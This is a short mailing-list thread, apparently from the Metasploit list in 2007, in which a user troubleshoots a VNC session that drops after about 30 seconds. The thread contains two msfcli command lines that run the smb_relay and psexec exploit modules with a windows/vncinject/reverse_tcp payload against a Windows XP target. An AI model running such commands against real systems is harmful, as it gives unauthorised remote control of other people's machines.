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Re: smb_relay and vncinject

From: sigtrap at (sigtrap)
Date: Mon, 10 Sep 2007 15:51:11 +0200

Wrong command. I was using the command below with another SMB relay
program... The VNC closes unexpectedly with the other SMB relay program
too (VNC was then started with msf psexec).
The command that I wanna use is:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=
PAYLOAD=windows/vncinject/reverse_tcp E


-----Original Message-----
From: "sigtrap" <sigtrap at>
To: <framework at>
Date: Mon, 10 Sep 2007 15:45:10 +0200
Subject: smb_relay and vncinject

On Gentoo I'm running msf v3.1-dev:
./msfcli windows/smb/psexec DisableCourtesyShell=1 LHOST=
RHOST= PAYLOAD=windows/vncinject/reverse_tcp E

Everything works nice and the vncviewer (I have tried tightvnc and
"normal" vnc) pops up. But after 10-30 seconds the vncviewer closes and
msf tells me:
[*] VNC connection closed.

On the Victim (Windows XP Pro) the system event viewer reports Event ID
(Service Control Manager) Timeout (30000 ms) waiting for the [Random]
service to connect.

I dont know if the Windows error should be regarded becouse the
runs perfectly for a couple of seconds...

Any idees?


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